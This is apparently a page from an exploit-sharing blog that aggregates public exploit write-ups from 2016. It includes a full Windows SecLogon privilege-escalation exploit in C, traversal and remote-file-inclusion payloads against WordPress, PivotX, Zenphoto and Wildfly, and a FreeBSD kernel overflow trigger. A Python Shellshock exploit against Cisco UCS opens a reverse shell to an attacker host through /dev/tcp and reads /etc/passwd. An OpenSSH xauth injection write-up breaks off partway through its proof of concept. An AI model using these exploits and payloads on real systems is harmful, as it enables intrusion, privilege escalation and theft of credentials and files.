# Exploit Title: Wordpress Import CSV | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/xml-and-csv-import-in-article-content.zip
# Stable Tag: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
/wp-content/plugins/xml-and-csv-import-in-article-content/readme.txt
======================================
[PoC]
======================================
Go to /wp-content/plugins/xml-and-csv-import-in-article-content/upload-process.php.
Click on the link "From an url".
In "URL" field to write "../../../wp-config.php".
Validate form and inspect the body.
======================================
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863592418
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/*
Sources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=687
https://googleprojectzero.blogspot.ca/2016/03/exploiting-leaked-thread-handle.html
Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege
Summary:
The SecLogon service does not sanitize standard handles when creating a new process leading to duplicating a system service thread pool handle into a user accessible process. This can be used to elevate privileges to Local System.
Description:
The APIs CreateProcessWithToken and CreateProcessWithLogon are exposed to user applications, however they’re actually implemented in a system service, Secondary Logon. When these methods are called it’s actually dispatched over RPC to the service.
Both these methods take the normal STARTUPINFO structure and supports the passing of standard handles when the STARTF_USESTDHANDLES is used. Rather than the “standard” way of inheriting these handles to the new process the service copies them manually using the SlpSetStdHandles function. This does something equivalent to:
BOOL SlpSetStdHandles(HANDLE hSrcProcess, HANDLE hTargetProcess, HANDLE handles[]) {
foreach(HANDLE h : handles) {
DuplicateHandle(hSrcProcesss, h, hTargetProcess, &hNewHandle, 0, FALSE, DUPLICATE_SAME_ACCESS);
}
}
The vulnerability is nothing sanitizes these values. NtDuplicateObject special cases a couple of values for the source handle, Current Process (-1) and Current Thread (-2). NtDuplicateObject switches the thread’s current process to the target process when duplicating the handle, this means that while duplicating -1 will return a handle to the new process -2 will return a handle to the current thread which is actually a thread inside the svchost process hosting seclogon. When passing DUPLICATE_SAME_ACCESS for the current thread handle it's automatically given THREAD_ALL_ACCESS rights. The handle now exists in the new process and can be used by low privileged code.
This can be exploited in a number of ways. The new process can set the thread’s context causing the thread to dispatch to an arbitrary RIP. Or as these are thread pool threads servicing RPC requests for services such as BITS, Task Scheduler or seclogon itself you could do things like force a system level impersonation token (repeatedly) which overrides the security enforcement of these services leading to arbitrary file writes or process creation at Local System. It would be easy enough to run the exploit multiple times to capture handles to all thread pool threads available for RPC in the hosting process and then just keep trying until it succeeds.
One final point on exploitability. A normal user cannot use CreateProcessWithToken as the service checks that an arbitrary process can be opened by the user and has SeImpersonatePrivilege in its primary token. CreateProcessWithLogon will work but it seems you’d need to know a user’s password which makes it less useful for a malicious attacker. However you can specify the LOGON_NETCREDENTIALS_ONLY flag which changes the behaviour of LogonUser, instead of needing valid credentials the password is used to change the network password of a copy of the caller’s token. The password can be anything you like, it doesn’t matter.
Proof of Concept:
I’ve provided a PoC as a C# source code file. You need to compile it with Any CPU support (do not set 32 bit preferred). The PoC must match the OS bitness.
1) Compile the C# source code file.
2) Execute the poc executable as a normal user. This will not work from low IL.
3) The PoC should display a message box on error or success.
Expected Result:
The call to CreateProcessWithLogon should fail and the PoC will display the error.
Observed Result:
The process shows that it’s captured a handle from a service process. If you check process explorer or similar you’ll see the thread handle has full access rights.
*/
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <map>
#define MAX_PROCESSES 1000
HANDLE GetThreadHandle()
{
PROCESS_INFORMATION procInfo = {};
STARTUPINFO startInfo = {};
startInfo.cb = sizeof(startInfo);
startInfo.hStdInput = GetCurrentThread();
startInfo.hStdOutput = GetCurrentThread();
startInfo.hStdError = GetCurrentThread();
startInfo.dwFlags = STARTF_USESTDHANDLES;
if (CreateProcessWithLogonW(L"test", L"test", L"test",
LOGON_NETCREDENTIALS_ONLY,
nullptr, L"cmd.exe", CREATE_SUSPENDED,
nullptr, nullptr, &startInfo, &procInfo))
{
HANDLE hThread;
BOOL res = DuplicateHandle(procInfo.hProcess, (HANDLE)0x4,
GetCurrentProcess(), &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS);
DWORD dwLastError = GetLastError();
TerminateProcess(procInfo.hProcess, 1);
CloseHandle(procInfo.hProcess);
CloseHandle(procInfo.hThread);
if (!res)
{
printf("Error duplicating handle %d\n", dwLastError);
exit(1);
}
return hThread;
}
else
{
printf("Error: %d\n", GetLastError());
exit(1);
}
}
typedef NTSTATUS __stdcall NtImpersonateThread(HANDLE ThreadHandle,
HANDLE ThreadToImpersonate,
PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService);
HANDLE GetSystemToken(HANDLE hThread)
{
SuspendThread(hThread);
NtImpersonateThread* fNtImpersonateThread =
(NtImpersonateThread*)GetProcAddress(GetModuleHandle(L"ntdll"),
"NtImpersonateThread");
SECURITY_QUALITY_OF_SERVICE sqos = {};
sqos.Length = sizeof(sqos);
sqos.ImpersonationLevel = SecurityImpersonation;
SetThreadToken(&hThread, nullptr);
NTSTATUS status = fNtImpersonateThread(hThread, hThread, &sqos);
if (status != 0)
{
ResumeThread(hThread);
printf("Error impersonating thread %08X\n", status);
exit(1);
}
HANDLE hToken;
if (!OpenThreadToken(hThread, TOKEN_DUPLICATE | TOKEN_IMPERSONATE,
FALSE, &hToken))
{
printf("Error opening thread token: %d\n", GetLastError());
ResumeThread(hThread);
exit(1);
}
ResumeThread(hThread);
return hToken;
}
struct ThreadArg
{
HANDLE hThread;
HANDLE hToken;
};
DWORD CALLBACK SetTokenThread(LPVOID lpArg)
{
ThreadArg* arg = (ThreadArg*)lpArg;
while (true)
{
if (!SetThreadToken(&arg->hThread, arg->hToken))
{
printf("Error setting token: %d\n", GetLastError());
break;
}
}
return 0;
}
int main()
{
std::map<DWORD, HANDLE> thread_handles;
printf("Gathering thread handles\n");
for (int i = 0; i < MAX_PROCESSES; ++i) {
HANDLE hThread = GetThreadHandle();
DWORD dwTid = GetThreadId(hThread);
if (!dwTid)
{
printf("Handle not a thread: %d\n", GetLastError());
exit(1);
}
if (thread_handles.find(dwTid) == thread_handles.end())
{
thread_handles[dwTid] = hThread;
}
else
{
CloseHandle(hThread);
}
}
printf("Done, got %zd handles\n", thread_handles.size());
if (thread_handles.size() > 0)
{
HANDLE hToken = GetSystemToken(thread_handles.begin()->second);
printf("System Token: %p\n", hToken);
for (const auto& pair : thread_handles)
{
ThreadArg* arg = new ThreadArg;
arg->hThread = pair.second;
DuplicateToken(hToken, SecurityImpersonation, &arg->hToken);
CreateThread(nullptr, 0, SetTokenThread, arg, 0, nullptr);
}
while (true)
{
PROCESS_INFORMATION procInfo = {};
STARTUPINFO startInfo = {};
startInfo.cb = sizeof(startInfo);
if (CreateProcessWithLogonW(L"test", L"test", L"test",
LOGON_NETCREDENTIALS_ONLY, nullptr,
L"cmd.exe", CREATE_SUSPENDED, nullptr, nullptr,
&startInfo, &procInfo))
{
HANDLE hProcessToken;
// If we can't get process token good chance it's a system process.
if (!OpenProcessToken(procInfo.hProcess, MAXIMUM_ALLOWED,
&hProcessToken))
{
printf("Couldn't open process token %d\n", GetLastError());
ResumeThread(procInfo.hThread);
break;
}
// Just to be sure let's check the process token isn't elevated.
TOKEN_ELEVATION elevation;
DWORD dwSize = 0;
if (!GetTokenInformation(hProcessToken, TokenElevation,
&elevation, sizeof(elevation), &dwSize))
{
printf("Couldn't get token elevation: %d\n", GetLastError());
ResumeThread(procInfo.hThread);
break;
}
if (elevation.TokenIsElevated)
{
printf("Created elevated process\n");
break;
}
TerminateProcess(procInfo.hProcess, 1);
CloseHandle(procInfo.hProcess);
CloseHandle(procInfo.hThread);
}
}
}
return 0;
}
Exploit Title: Wildfly: WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass
Date: 09.02.16
Exploit Author: Tal Solomon of Palantir Security
Vendor Homepage: https://bugzilla.redhat.com/show_bug.cgi?id=1305937
Software Link: http://wildfly.org/downloads/
Version: This issue effects versions of Wildfly prior to 10.0.0.Final, including 9.0.2.Final, and 8.2.1.Final.
Tested on: Windows
CVE : CVE-2016-0793
An information disclosure of the content of restricted files WEB-INF and META-INF via filter mechanism was reported. Servlet filter restriction mechanism is enforced by two code checks:
if (path.startsWith("/META-INF") || path.startsWith("META-INF") || path.startsWith("/WEB-INF") || path.startsWith("WEB-INF")) {
return false;
}
private boolean isForbiddenPath(String path) {
return path.equalsIgnoreCase("/meta-inf/") || path.regionMatches(true, 0, "/web-inf/", 0, "/web-inf/".length());
}
which can be bypassed using lower case and adding meaningless character to path.
Proof of Concept Video:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39573.zip
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: PivotX 2.3.11
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pivotx.net/
Vulnerability Type: Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 01/20/2016
Disclosed to public: 03/15/2016
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
vulnerable to Directory Traversal, allowing authenticated users to read and
delete files outside of the PivotX directory.
3. Details
Description
CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
The function cleanPath which is responsible for sanitizing path names can be
bypassed by an attacker, leading to directory traversal in multiple places.
Proof of Concept
Admins and Superadmins can read any file:
http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=
L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//.....//.../
/.....//...//.....//...//.....//...//.....//...//etc/passwd
Advanced users, Admins and Superadmins can delete any file, possibly leading to
DOS:
http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.....//.../
/.....//...//.....//...//.....//...//.....//...//.....//...//important/
important.file&pivotxsession=ovyyn4ob2jc5ym92
Code
lib.php
function cleanPath($path) {
$path = str_replace('../', '', $path);
$path = str_replace('..\\', '', $path);
$path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
return $path;
}
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Zenphoto 1.4.11
Fixed in: 1.4.12
Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/
zenphoto-1.4.12.zip
Vendor Website: http://www.zenphoto.org/
Vulnerability Type: RFI
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to 03/15/2016
public:
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
vulnerable to remote file inclusion. An admin account is required.
3. Details
Description
CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
When downloading a log file, the input is not properly sanitized, leading to
RFI.
An admin account is required, and allow_url_fopen must be set to true - which
is the default setting.
In old versions of PHP, this would additionally lead to LFI via null byte
poisoning or path expansion, regardless of allow_url_fopen settings.
Proof of Concept
GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=
logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=
security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1
Code
// admin-logs.php (sanitize(x, 3) only strips out tags)
case 'download_log':
$zipname = sanitize($_GET['tab'], 3) . '.zip';
if (class_exists('ZipArchive')) {
$zip = new ZipArchive;
$zip->open($zipname, ZipArchive::CREATE);
$zip->addFile($file, basename($file));
$zip->close();
ob_get_clean();
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private", false);
header("Content-Type: application/zip");
header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($zipname));
readfile($zipname);
// remove zip file from temp path
unlink($zipname);
exit;
} else {
include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
$zip = new ZipStream($zipname);
$zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
$zip->finish();
}
break;
4. Solution
To mitigate this issue please upgrade at least to version 1.4.12:
https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
01/29/2016 Vendor replies
02/23/2016 Vendor sends fix for verification
02/23/2016 Suggested improvements for attempted fix
02/29/2016 Delayed Disclosure
03/14/2016 Vendor releases fix
03/15/2016 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
/*
1. Advisory Information
Title: FreeBSD Kernel amd64_set_ldt Heap Overflow
Advisory ID: CORE-2016-0005
Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-amd64_set_ldt-heap-overflow
Date published: 2016-03-16
Date of last update: 2016-03-14
Vendors contacted: FreeBSD
Release mode: Coordinated release
2. Vulnerability Information
Class: Unsigned to Signed Conversion Error [CWE-196]
Impact: Denial of service
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2016-1885
3. Vulnerability Description
FreeBSD is an advanced computer operating system used to power modern servers, desktops and embedded platforms. A large community has continually developed it for more than thirty years. Its advanced networking, security and storage features have made FreeBSD the platform of choice for many of the busiest web sites and most pervasive embedded networking and storage devices.
An integer signedness error has been found in the amd64_set_ldt() function in the FreeBSD kernel code (defined in the /sys/amd64/amd64/sys_machdep.c file), which implements the i386_set_ldt system call on the amd64 version of the OS. This integer signedness issue ultimately leads to a heap overflow in the kernel, allowing local unprivileged attackers to crash the system.
4. Vulnerable packages
FreeBSD 10.2 amd64.
Other amd64 versions may be affected too but they were no checked.
5. Non-vulnerable packages
FreeBSD 10.2-RELENG.
6. Vendor Information, Solutions and Workarounds
The FreeBSD team has released patches for the reported vulnerabilities. You should upgrade to FreeBSD 10.2-RELENG.
7. Credits
This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
8. Technical Description / Proof of Concept Code
8.1. FreeBSD amd64_set_ldt Integer Signedness Vulnerability
[CVE-2016-1885] FreeBSD exposes the i386_set_ldt[1] architecture-dependent system call for its Intel i386 version. This system call can be used to manage i386 per-process Local Descriptor Table (LDT) entries. The amd64 version of FreeBSD still exposes this system call for 32-bit applications running on the 64-bit version of the OS.
Architecture-specific system calls are handled by the FreeBSD kernel in the sysarch() function, which is defined in the /sys/amd64/amd64/sys_machdep.c[2] file:
int
sysarch(td, uap)
struct thread *td;
register struct sysarch_args *uap;
{
[...]
if (uap->op == I386_GET_LDT || uap->op == I386_SET_LDT)
return (sysarch_ldt(td, uap, UIO_USERSPACE));
[...]
As we can see in the code snippet above, if the system call being invoked is either I386_GET_LDT or I386_SET_LDT, then the sysarch_ldt() function is called. The following code excerpt shows the part of the sysarch_ldt() function that is in charge of handling the I386_SET_LDT syscall:
int
sysarch_ldt(struct thread *td, struct sysarch_args *uap, int uap_space)
{
struct i386_ldt_args *largs, la;
struct user_segment_descriptor *lp;
[...]
switch (uap->op) {
[...]
case I386_SET_LDT:
if (largs->descs != NULL && largs->num > max_ldt_segment)
return (EINVAL);
set_pcb_flags(td->td_pcb, PCB_FULL_IRET);
if (largs->descs != NULL) {
lp = malloc(largs->num * sizeof(struct
user_segment_descriptor), M_TEMP, M_WAITOK);
error = copyin(largs->descs, lp, largs->num *
sizeof(struct user_segment_descriptor));
if (error == 0)
error = amd64_set_ldt(td, largs, lp);
free(lp, M_TEMP);
} else {
error = amd64_set_ldt(td, largs, NULL);
}
break;
The largs variable that can be seen there is a pointer to an i386_ldt_args structure, which is defined as follows in the /sys/x86/include/sysarch.h[3] file:
struct i386_ldt_args {
unsigned int start;
union descriptor *descs;
unsigned int num;
};
Note that all of the fields of the i386_ldt_args structure are fully user-controlled: they match the 3 arguments specified by the user when i386_set_ldt() was called from user mode:
int i386_set_ldt(int start_sel, union descriptor *descs, int num_sels);
From the sysarch_ldt() snippet above we can see that if we call i386_set_ldt() from user mode specifying a NULL pointer as the second argument (largs->descs), then it will end up calling the amd64_set_ldt() function, passing the largs variable as the second argument, and a NULL pointer as the third argument. This is the prototype of the amd64_set_ldt() function being called:
int
amd64_set_ldt(struct thread *td, struct i386_ldt_args *uap, struct user_segment_descriptor *descs);
amd64_set_ldt() is the vulnerable function here. Since it is being called with its third argument (the descs pointer) set to NULL, the following code path will be executed (remember that every field in the i386_ldt_args structure pointed by the uap pointer is fully controlled from user mode):
int
amd64_set_ldt(td, uap, descs)
struct thread *td;
struct i386_ldt_args *uap;
struct user_segment_descriptor *descs;
{
[...]
int largest_ld;
[...]
608 if (descs == NULL) {
609 Free descriptors
610 if (uap->start == 0 && uap->num == 0)
611 uap->num = max_ldt_segment;
612 if (uap->num == 0)
613 return (EINVAL);
614 if ((pldt = mdp->md_ldt) == NULL ||
615 uap->start >= max_ldt_segment)
616 return (0);
617 largest_ld = uap->start + uap->num;
618 if (largest_ld > max_ldt_segment)
619 largest_ld = max_ldt_segment;
620 i = largest_ld - uap->start;
621 mtx_lock(&dt_lock);
622 bzero(&((struct user_segment_descriptor *)(pldt->ldt_base))
623 [uap->start], sizeof(struct user_segment_descriptor) * i);
624 mtx_unlock(&dt_lock);
625 return (0);
626 }
The two if statements at lines 610 and 612 perform some sanity checks against uap->start and uap->num, which can be avoided by setting uap->num to a value different than 0. The next check at lines 614/615 will cause the function to exit early if the mdp->md_ldt pointer is NULL, or if uap->start is greater or equal than max_ldt_segment (1024). Having mdp->md_ldt holding a non-NULL value can be achieved by adding an initial entry to the process LDT before triggering the bug, like this:
struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0};
i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1);
After passing those checks we reach the vulnerable code at lines 617-619:
617 largest_ld = uap->start + uap->num;
618 if (largest_ld > max_ldt_segment)
619 largest_ld = max_ldt_segment;
620 i = largest_ld - uap->start;
Note that largest_ld is a signed int that will hold the sum of uap->start + uap->num. The code at lines 618-619 tries to ensure that largest_ld is not greater than max_ldt_segment (1024); however, being largest_ld a signed integer holding a value fully controlled from user mode, it will perform a signed comparison that can be bypassed by setting uap->num to a negative number.
This signedness error will ultimately lead to a heap overflow in the FreeBSD kernel when the bzero() function is later called with a huge value as its len parameter:
622 bzero(&((struct user_segment_descriptor *)(pldt->ldt_base))
623 [uap->start], sizeof(struct user_segment_descriptor) * i);
8.2. Proof of Concept
The following Proof-of-Concept code reproduces the vulnerability in a default FreeBSD 10.2-RELEASE-amd64 installation running a GENERIC kernel:
*/
/* $ clang amd64_set_ldt.c -o amd64_set_ldt -m32 */
#include <stdio.h>
#include <unistd.h>
#include <machine/segments.h>
#include <machine/sysarch.h>
#include <sysexits.h>
#include <err.h>
int main(int argc, char **argv){
int res;
struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0};
printf("[+] Adding an initial entry to the process LDT...\n");
res = i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1);
if (res < 0){
err(EX_OSERR, "i386_set_ldt(LDT_AUTO_ALLOC)");
}
printf("returned index: %d\n", res);
printf("Triggering the bug...\n");
res = i386_set_ldt(1, NULL, 0x80000000);
}
/*
9. Report Timeline
2016-03-02: Core Security sent an initial notification to FreeBSD.
2016-03-02: FreeBSD confirmed reception of our email and requested we sent them a draft version of the advisory.
2016-03-02: Core Security sent FreeBSD a draft version of the advisory. We requested them to let us know once they finished reviewing the advisory in order to coordinate a publication date.
2016-03-11: Core Security asked FreeBSD if they were able to review and verify the reported issue. We additionally requested an estimated date for releasing the fix/update.
2016-03-11: FreeBSD informed us they were going to release the update in the middle of the following week.
2016-03-11: Core Security asked FreeBSD if they had the specific date and time they were going to release the update. We additionally requested a CVE identifier for the vulnerability considering they are registered as a CNA.
2016-03-11: FreeBSD informed us they would probably release it on Wednesday 16th of March and that they assigned the CVE-2016-1885 ID.
2016-03-16: Advisory CORE-2016-0005 published.
10. References
[1] https://www.freebsd.org/cgi/man.cgi?query=i386_set_ldt&sektion=2&manpath=FreeBSD+8.2-RELEASE
[2] https://svnweb.freebsd.org/base/release/10.2.0/sys/amd64/amd64/sys_machdep.c?view=markup
[3] https://svnweb.freebsd.org/base/release/10.2.0/sys/x86/include/sysarch.h?view=markup
11. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
12. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
13. Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
*/
#!/usr/bin/python
###############################################
# Cisco UCS Manager 2.1(1b) Shellshock Exploit
#
# CVE-2014-6278
# Confirmed on version 2.1(1b), but more are likely vulnerable.
# Cisco's advisory:
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
# Exploit generates a reverse shell to a nc listener.
# Exploit Author: @thatchriseckert
###############################################
import sys
import requests
import time
if len(sys.argv) < 4:
print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"
print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>"
print "[*]"
print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"
print "[*] Listener: nc -lvp <port>"
print "\n"
sys.exit()
#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings()
ucs = sys.argv[1]
url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"
attackhost = sys.argv[2]
revshellport = sys.argv[3]
headers1 = {
'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'
}
headers2 = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)'
}
def exploit():
try:
r = requests.get(url, headers=headers1, verify=False, timeout=5)
except Exception, e:
if 'timeout' in str(e):
print "[+] Success. Enjoy your shell..."
else:
print "[-] Something is wrong..."
print "[-] Error: " + str(e)
def main():
try:
r = requests.get(url, headers=headers2, verify=False, timeout=3)
if r.content.startswith('\nroot:'):
print "[+] Host is vulnerable, spawning shell..."
time.sleep(3)
exploit()
else:
print "[-] Host is not vulnerable, quitting..."
sys.exit()
except Exception, e:
print "[-] Something is wrong..."
print "[-] Error: " + str(e)
if __name__ == "__main__":
main()
'''
Author: <github.com/tintinweb>
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
Version: 0.2
Date: Mar 3rd, 2016
Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass
Overview
--------
Name: openssh
Vendor: OpenBSD
References: * http://www.openssh.com/[1]
Version: 7.2p1 [2]
Latest Version: 7.2p1
Other Versions: <= 7.2p1 (all versions; dating back ~20 years)
Platform(s): linux
Technology: c
Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-3115
Description
---------
quote website [1]
> OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.
Summary
-------
An authenticated user may inject arbitrary xauth commands by sending an
x11 channel request that includes a newline character in the x11 cookie.
The newline acts as a command separator to the xauth binary. This attack requires
the server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.
By injecting xauth commands one gains limited* read/write arbitrary files,
information leakage or xauth-connect capabilities. These capabilities can be
leveraged by an authenticated restricted user - e.g. one with the login shell
configured as /bin/false or one with configured forced-commands - to bypass
account restriction. This is generally not expected.
The injected xauth commands are performed with the effective permissions of the
logged in user as the sshd already dropped its privileges.
Quick-Info:
* requires: X11Forwarding yes
* bypasses /bin/false and forced-commands
** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)
* does not bypass /bin/nologin (as there is special treatment for this)
Capabilities (xauth):
* Xauth
* write file: limited chars, xauthdb format
* read file: limit lines cut at first \s
* infoleak: environment
* connect to other devices (may allow port probing)
PoC see ref github.
Patch see ref github.
Details
-------
// see annotated code below
* server_input_channel_req (serverloop.c)
*- session_input_channel_req:2299 (session.c [2])
*- session_x11_req:2181
* do_exec_pty or do_exec_no_pty
*- do_child
*- do_rc_files (session.c:1335 [2])
Upon receiving an `x11-req` type channel request sshd parses the channel request
parameters `auth_proto` and `auth_data` from the client ssh packet where
`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)
and `auth_data` contains the actual x11 auth cookie. This information is stored
in a session specific datastore. When calling `execute` on that session, sshd will
call `do_rc_files` which tries to figure out if this is an x11 call by evaluating
if `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND
there is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc`
is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.
Note that `auth_data` nor `auth_proto` was sanitized or validated, it just contains
user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a
command-separator to the `xauth` binary, this allows a client to inject arbitrary
`xauth` commands.
Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted
input as arguments to that script.
Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]
This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth
command injection:
SYNOPSIS
xauth [ -f authfile ] [ -vqibn ] [ command arg ... ]
add displayname protocolname hexkey
generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]
[n]extract filename displayname...
[n]list [displayname...]
[n]merge [filename...]
remove displayname...
source filename
info
exit
quit
version
help
?
Interesting commands are:
info - leaks environment information / path
~# xauth info
xauth: file /root/.Xauthority does not exist
Authority file: /root/.Xauthority
File new: yes
File locked: no
Number of entries: 0
Changes honored: yes
Changes made: no
Current input: (argv):1
source - arbitrary file read (cut on first `\s`)
# xauth source /etc/shadow
xauth: file /root/.Xauthority does not exist
xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::"
extract - arbitrary file write
* limited characters
* in xauth.db format
* since it is not compressed it can be combined with `xauth add` to
first store data in the database and then export it to an arbitrary
location e.g. to plant a shell or do other things.
generate - connect to <ip>:<port> (port probing, connect back and pot. exploit
vulnerabilities in X.org
Source
------
Inline annotations are prefixed with `//#!`
/*
* Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found
* first in this order).
*/
static void
do_rc_files(Session *s, const char *shell)
{
...
snprintf(cmd, sizeof cmd, "%s -q -",
options.xauth_location);
f = popen(cmd, "w"); //#! run xauth -q -
if (f) {
fprintf(f, "remove %s\n", //#! remove <user_tainted_data> - injecting \n auth_display injects xauth command
s->auth_display);
fprintf(f, "add %s %s %s\n", //#! \n injection
s->auth_display, s->auth_proto,
s->auth_data);
pclose(f);
} else {
fprintf(stderr, "Could not run %s\n",
cmd);
}
}
}
Proof of Concept
----------------
Prerequisites:
* install python 2.7.x
* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x
* make sure `poc.py`
Usage: <host> <port> <username> <password or path_to_privkey>
path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
poc:
1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user1/.ssh/authorized_keys
